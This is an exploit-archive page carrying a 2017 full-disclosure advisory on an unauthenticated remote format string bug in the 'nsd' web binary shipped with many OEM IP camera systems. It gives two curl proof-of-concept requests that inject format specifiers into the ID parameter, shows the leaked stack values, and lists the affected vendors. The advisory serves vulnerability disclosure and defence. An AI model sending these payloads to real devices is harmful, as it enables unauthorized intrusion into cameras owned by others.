exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nsd Format String

nsd Format String
Posted Dec 17, 2017
Authored by bashis

The nsd binary shipping with multiple camera security systems suffers from a format string vulnerability.

tags | exploit
SHA-256 | 0158af91f1804a0e9359005af8cc870bf882c536878b03e5930291a42bb7217a

nsd Format String

Change Mirror Download
[STX]

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day


-[ PoC ]-

1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'

[...]
function initHideWidget(){
document.getElementById("devip").value = "192.168.57.20";
document.getElementById("cameraid").value = 1;
document.getElementById("streamid").value = 1;
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
document.getElementById("lg").value = "BBBB";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
document.getElementById("ismotorize").value = 1;

[...]
Note: 'BBBB' are hiding within '5e3006db'

2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
function initHideWidget(){
document.getElementById("ip").value = "192.168.57.20";
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
[...]


-[ Affected OEM ]-

Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
AFM Vision
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D

[ETX]




Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close